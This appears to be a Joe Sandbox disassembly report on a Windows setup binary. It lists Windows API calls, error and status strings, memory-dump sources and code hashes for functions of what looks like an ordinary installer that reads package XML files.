                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                              • GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • SetFilePointer.KERNEL32(?,00000000,6C8BA794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 6C8CAA49
                                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CAA97
                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C8CAAAC
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CAB2C
                                                                                              Strings
                                                                                              • Could not find mandatory data file %s. This is a bad package., xrefs: 6C8CAAE5
                                                                                              • ReadXML failed to open XML file %s, with error %d, xrefs: 6C8CAA07
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3$AllocCloseException@8HandleModuleNamePathPointerReadRelativeStringThrow
                                                                                              • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                                                              • API String ID: 3768868350-4172873023
                                                                                              • Opcode ID: db7b7535d5f4e80692fee94d8720676349c0915cb8c6416989405006c6e4cc5a
                                                                                              • Instruction ID: 644dff58a14553ea3a10312725b9e789657160b999c573cd0ec1bc5c3dc3dbbc
                                                                                              • Opcode Fuzzy Hash: db7b7535d5f4e80692fee94d8720676349c0915cb8c6416989405006c6e4cc5a
                                                                                              • Instruction Fuzzy Hash: 5D816B71A00209EFCF10DFA8C9859EEBBB9BF19318F14492AE511B7B50C734DA15CBA5
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8FA796
                                                                                                • Part of subcall function 6C8CC5D4: __EH_prolog3.LIBCMT ref: 6C8CC5DB
                                                                                                • Part of subcall function 6C8CC5D4: GetLastError.KERNEL32 ref: 6C8CC609
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C901236: __EH_prolog3.LIBCMT ref: 6C90123D
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA83B
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA8F4
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA95B
                                                                                              Strings
                                                                                              • Failed to record DisplayedLcidId, xrefs: 6C8FA855
                                                                                              • Failed to record IsRetailBuild, xrefs: 6C8FA975
                                                                                              • Failed to record PackageName, xrefs: 6C8FA7B8
                                                                                              • Failed to record InstallerVersion, xrefs: 6C8FA8B0
                                                                                              • Failed to record PackageVersion, xrefs: 6C8FA7F7
                                                                                              • Failed to record PatchType, xrefs: 6C8FA90E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last
                                                                                              • String ID: Failed to record DisplayedLcidId$Failed to record InstallerVersion$Failed to record IsRetailBuild$Failed to record PackageName$Failed to record PackageVersion$Failed to record PatchType
                                                                                              • API String ID: 685212868-335235891
                                                                                              • Opcode ID: 121fbe3372ceed56125f02d21e768e01a52bed72605601442e803946a10610ee
                                                                                              • Instruction ID: 0fd2cad6b5f3ae47638513eb2933ac03309dc56ae43e403587ebe251f0f55bec
                                                                                              • Opcode Fuzzy Hash: 121fbe3372ceed56125f02d21e768e01a52bed72605601442e803946a10610ee
                                                                                              • Instruction Fuzzy Hash: 87518771200208BFDB20DFA5CA45ACE3B7ABF55398F114928B424DBB90C774E616DBA0
                                                                                              APIs
                                                                                                • Part of subcall function 6C8CC53D: GetLastError.KERNEL32(?,6C8FA320,38D98A99,?,?), ref: 6C8CC55E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C901236: __EH_prolog3.LIBCMT ref: 6C90123D
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA393
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA434
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA4A7
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA511
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA5A5
                                                                                              Strings
                                                                                              • Failed to record StartSession, xrefs: 6C8FA322
                                                                                              • Failed to record SetUserId, xrefs: 6C8FA3C0
                                                                                              • Failed to record StartupAppid, xrefs: 6C8FA4C1
                                                                                              • Failed to record MPC, xrefs: 6C8FA5BB
                                                                                              • Failed to record SetMachineId, xrefs: 6C8FA461
                                                                                              • Failed to record current state name, xrefs: 6C8FA52B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$H_prolog3
                                                                                              • String ID: Failed to record MPC$Failed to record SetMachineId$Failed to record SetUserId$Failed to record StartSession$Failed to record StartupAppid$Failed to record current state name
                                                                                              • API String ID: 3502553090-2804495384
                                                                                              • Opcode ID: 9088dc46fbaf37cc30954bbd254b67b364b5cf270f25ceac21c42bf5225ca38a
                                                                                              • Instruction ID: 84647e7bddbd5edf92b1e8ed7a8ab9fbbc956f59a07d4ca0648324ee26c60fcb
                                                                                              • Opcode Fuzzy Hash: 9088dc46fbaf37cc30954bbd254b67b364b5cf270f25ceac21c42bf5225ca38a
                                                                                              • Instruction Fuzzy Hash: CEA1C2312082419FD720CF69C945A9B7BE9BF653A8F100E2CF4A1D7BA1D774D909CB92
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E212E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E2484
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: CopyPackageFilesToDownloadLocation$DelayBetweenRetries$DownloadRetries$Items$No items found. The package must contain at least one item.$ParameterInfo.xml$true
                                                                                              • API String ID: 2489616738-2573507987
                                                                                              • Opcode ID: d831ebcdc94e9363603c3d092dd872bb417dd554b960585154276dff9ac8b45d
                                                                                              • Instruction ID: 8746a7a28cfa6f8df05b5392a8802e7986b847241e2a62d59d2e9691cd116643
                                                                                              • Opcode Fuzzy Hash: d831ebcdc94e9363603c3d092dd872bb417dd554b960585154276dff9ac8b45d
                                                                                              • Instruction Fuzzy Hash: 9DD1607090024ADFCF14CFA8CA85AEEBBB5BF59308F148599E414EB791C734DA05CBA1
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D3302
                                                                                                • Part of subcall function 6C5D3679: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C5D332F,?), ref: 6C5D3683
                                                                                                • Part of subcall function 6C5D3679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C5D332F,?), ref: 6C5D36B3
                                                                                                • Part of subcall function 6C5D3679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C5D36D5
                                                                                                • Part of subcall function 6C5D3679: CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D36E0
                                                                                              • EnterCriticalSection.KERNEL32(6C5F0168,?), ref: 6C5D3334
                                                                                              • LeaveCriticalSection.KERNEL32(6C5F0168,00000400,?), ref: 6C5D33F5
                                                                                              • LocalFree.KERNEL32(00000000), ref: 6C5D340C
                                                                                              • SetLastError.KERNEL32(00000057), ref: 6C5D341F
                                                                                                • Part of subcall function 6C5D17EB: malloc.MSVCRT ref: 6C5D17F6
                                                                                              • ctype.LIBCPMT ref: 6C5DEDDC
                                                                                                • Part of subcall function 6C5D343E: GetSystemTime.KERNEL32(00000000,00000838,00000000), ref: 6C5D347D
                                                                                                • Part of subcall function 6C5D343E: SystemTimeToFileTime.KERNEL32(00000000,00000000), ref: 6C5D348B
                                                                                                • Part of subcall function 6C5D30D2: InterlockedIncrement.KERNEL32(00000000), ref: 6C5D30D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$CriticalProcessSectionSystem$CloseConvertCurrentEnterErrorFileFreeHandleIncrementInterlockedLastLeaveLocalOpenStringTokenctypemallocmemset
                                                                                              • String ID: %s_%s$W
                                                                                              • API String ID: 2889056228-4070589124
                                                                                              • Opcode ID: bbeb5d473a5bebc7e5e3069484f6d186a037620ae39d411f4c441d0e79cc7ead
                                                                                              • Instruction ID: 3cbd5d82864c0779acb6a08831bbca578cc0fcdc34fd9f3de9d36d7566267aea
                                                                                              • Opcode Fuzzy Hash: bbeb5d473a5bebc7e5e3069484f6d186a037620ae39d411f4c441d0e79cc7ead
                                                                                              • Instruction Fuzzy Hash: 31C1C031900358DADB61DF18CC40F9ABAF8BF44308F568499E455A3961CBB1EE89CF88
                                                                                              Strings
                                                                                              • File lock postponed for %s., xrefs: 6C912D73
                                                                                              • File %s (%s), failed authentication. (Error = %d). It is recommended that you delete this file and retry setup again., xrefs: 6C912CF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: File %s (%s), failed authentication. (Error = %d). It is recommended that you delete this file and retry setup again.$File lock postponed for %s.
                                                                                              • API String ID: 0-2368451233
                                                                                              • Opcode ID: fb9295ce24e099a4cf8bffee23f75770ee9be23095d82e3bc15994ffa9cae0d7
                                                                                              • Instruction ID: 0417f8c97072c22bc150ac29fd7ce0c68ddfa140a06e0cdd32c0577e95efb58a
                                                                                              • Opcode Fuzzy Hash: fb9295ce24e099a4cf8bffee23f75770ee9be23095d82e3bc15994ffa9cae0d7
                                                                                              • Instruction Fuzzy Hash: B9C1BF711086449FC320DF68C845A8FBBE8BFA6728F050B19F4A497F91C770D919CBA6
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CAC5F
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8CAD66
                                                                                              • SysAllocString.OLEAUT32(-00000010), ref: 6C8CAE70
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CAF3F
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8CD5: __EH_prolog3.LIBCMT ref: 6C8F8CDC
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8C8415: __EH_prolog3.LIBCMT ref: 6C8C841C
                                                                                              Strings
                                                                                              • schema validation failure: Invalid ExpressionAlias or Id not found: , xrefs: 6C8CAF84
                                                                                              • //*[@Id='%s'], xrefs: 6C8CAD26
                                                                                              • schema validation failure: ExpressionAlias's Id not defined or defined too many times: , xrefs: 6C8CAEBF
                                                                                              • ExpressionAlias, xrefs: 6C8CACAC, 6C8CADEA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$String$AllocException@8FreeThrow
                                                                                              • String ID: //*[@Id='%s']$ExpressionAlias$schema validation failure: ExpressionAlias's Id not defined or defined too many times: $schema validation failure: Invalid ExpressionAlias or Id not found:
                                                                                              • API String ID: 191698298-1025498756
                                                                                              • Opcode ID: ed2732535c675ac2837293f5995ce6023232cb3fbe981835b2db9dbb75f961d7
                                                                                              • Instruction ID: 6ec11075206db97b0c7c41ee8258559d4268059a7bf619ea7e37ba9da6f780bc
                                                                                              • Opcode Fuzzy Hash: ed2732535c675ac2837293f5995ce6023232cb3fbe981835b2db9dbb75f961d7
                                                                                              • Instruction Fuzzy Hash: 1BC17071900249EFCB10DFE8CA849EEBBB5BF55308F244969E411EB741C735DA09DB61
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C90D44D
                                                                                              • GetCommandLineW.KERNEL32(0000006C,6C90B3B6,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C90D48E
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C90D4EF
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C90D6A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandH_prolog3_catchInitializeLineUninitialize
                                                                                              • String ID: Hide$SplashScreen$UiInfo.xml$nosplashscreen
                                                                                              • API String ID: 1338294413-2964427009
                                                                                              • Opcode ID: 6696892b680a02607f0213ac42719fd9a0f3779ec89a595df7d698d63fc82ff0
                                                                                              • Instruction ID: 40a00a526a07c760bc3005611838cb6df1413d84399866c221fb6f9513d9408b
                                                                                              • Opcode Fuzzy Hash: 6696892b680a02607f0213ac42719fd9a0f3779ec89a595df7d698d63fc82ff0
                                                                                              • Instruction Fuzzy Hash: 81819171A04248DFDF10CFE8C944BDEBBB8AF15308F1445A9E454ABB81CB75DA09CBA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C9C41
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8C9D24
                                                                                              • __fassign.LIBCMT ref: 6C8C9D58
                                                                                              • _wcstoul.LIBCMT ref: 6C8C9D65
                                                                                                • Part of subcall function 6C91B6D0: wcstoxl.LIBCMT ref: 6C91B6E0
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                              • __get_errno.LIBCMT ref: 6C8C9D74
                                                                                              Strings
                                                                                              • schema validation failure: non-numeric value, %s, for %s, xrefs: 6C8C9DB1
                                                                                              • ", xrefs: 6C8C9D88
                                                                                              • schema validation failure: empty value, %s, for %s, xrefs: 6C8C9CA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw__fassign__get_errno_wcstoulwcstoxl
                                                                                              • String ID: "$schema validation failure: empty value, %s, for %s$schema validation failure: non-numeric value, %s, for %s
                                                                                              • API String ID: 2631245360-326575430
                                                                                              • Opcode ID: 1d9c6ef3d13a34ce02b9c59b41c153fffac2bbae6e81e672b679dcdadca0513e
                                                                                              • Instruction ID: cae07f709545c4854f120134270f13f897343375770197025f25e395320963dc
                                                                                              • Opcode Fuzzy Hash: 1d9c6ef3d13a34ce02b9c59b41c153fffac2bbae6e81e672b679dcdadca0513e
                                                                                              • Instruction Fuzzy Hash: 82619571900149EFCF10DFE8C9849EEBBB9BF15318F14899AE111A7B41D734DA09CB62
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8F51C7
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C8F51DC
                                                                                                • Part of subcall function 6C918859: SysStringByteLen.OLEAUT32(00000000), ref: 6C918860
                                                                                                • Part of subcall function 6C918859: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 6C918869
                                                                                                • Part of subcall function 6C8CB00D: __EH_prolog3.LIBCMT ref: 6C8CB014
                                                                                                • Part of subcall function 6C8CB00D: SysFreeString.OLEAUT32(?), ref: 6C8CB044
                                                                                              • CoUninitialize.COMBASE(?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml,?,?), ref: 6C8F538C
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA6DB: __EH_prolog3.LIBCMT ref: 6C8CA6E2
                                                                                                • Part of subcall function 6C8CA6DB: SysFreeString.OLEAUT32(?), ref: 6C8CA72B
                                                                                                • Part of subcall function 6C8CA7C3: __EH_prolog3.LIBCMT ref: 6C8CA7CA
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8F5343
                                                                                              Strings
                                                                                              • //BlockIf[@ID], xrefs: 6C8F5218
                                                                                              • ParameterInfo.xml, xrefs: 6C8F52FE
                                                                                              • BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID=", xrefs: 6C8F52CB
                                                                                              • #(loc., xrefs: 6C8F52B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3String$ByteFree$AllocException@8H_prolog3_catchInitializeThrowUninitialize
                                                                                              • String ID: #(loc.$//BlockIf[@ID]$BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID="$ParameterInfo.xml
                                                                                              • API String ID: 3727013976-3244902561
                                                                                              • Opcode ID: 90e6bcfca06097c0fe416f5de155401fb1d34b537aadf6f11ba8ee84e78e7dff
                                                                                              • Instruction ID: f7c7e8c755b9a7ded4bf80b96d97327804afd19da3cb139e7913d598b924747b
                                                                                              • Opcode Fuzzy Hash: 90e6bcfca06097c0fe416f5de155401fb1d34b537aadf6f11ba8ee84e78e7dff
                                                                                              • Instruction Fuzzy Hash: D351637190424CDFCB10DBE8CA84ADEBBB5AF15318F248569E125E7B80C774DA4ACB61
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8D50DC
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8380: __EH_prolog3.LIBCMT ref: 6C8F8387
                                                                                                • Part of subcall function 6C8C388B: __EH_prolog3.LIBCMT ref: 6C8C3892
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C8D512A
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,00000738,?,?,?,00000000,?,?,?,38D98A99,?,?,?), ref: 6C8D5148
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D5270
                                                                                                • Part of subcall function 6C8D54B1: __EH_prolog3.LIBCMT ref: 6C8D54B8
                                                                                                • Part of subcall function 6C8D54B1: __CxxThrowException@8.LIBCMT ref: 6C8D5540
                                                                                              • CoUninitialize.COMBASE(02F92298,?,succeeded,?,?,?,00000000,?,?,?,38D98A99,?,?,?), ref: 6C8D51E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw$CreateH_prolog3_catchInitializeInstanceUninitialize
                                                                                              • String ID: IronMan::LocalizedData::CreateLocalizedData$succeeded$threw exception
                                                                                              • API String ID: 4097945976-352736096
                                                                                              • Opcode ID: 6b2e3742f98a86ae9825ec5acac1c091a3d7c4d74f0d643a01b7c54819f87fe8
                                                                                              • Instruction ID: 95203b4699fe8107627b18452559b2be40eae6261f0232d2771b557d8f237725
                                                                                              • Opcode Fuzzy Hash: 6b2e3742f98a86ae9825ec5acac1c091a3d7c4d74f0d643a01b7c54819f87fe8
                                                                                              • Instruction Fuzzy Hash: 8D514D7090020DEFCB10CFA8C984ADE7B79AF45318F14895AF115EB750C735EA49CBA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C9159FF
                                                                                              • GetCommandLineW.KERNEL32(?), ref: 6C915A64
                                                                                                • Part of subcall function 6C8FFF21: _wcsnlen.LIBCMT ref: 6C8FFF54
                                                                                                • Part of subcall function 6C8FFF21: _memcpy_s.LIBCMT ref: 6C8FFF8A
                                                                                              Strings
                                                                                              • - to be downloaded, xrefs: 6C915B05
                                                                                              • - available locally, xrefs: 6C915AEC
                                                                                              • - available but not verified yet, xrefs: 6C915ADC
                                                                                              • - available locally and verified., xrefs: 6C915AC2
                                                                                              • not locally available, but no URL to bedownloaded - error!, xrefs: 6C915B13
                                                                                              • - payload not required for this item to perform action., xrefs: 6C915A2C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandH_prolog3Line_memcpy_s_wcsnlen
                                                                                              • String ID: - available but not verified yet$ - available locally$ - available locally and verified.$ - payload not required for this item to perform action.$ - to be downloaded$ not locally available, but no URL to bedownloaded - error!
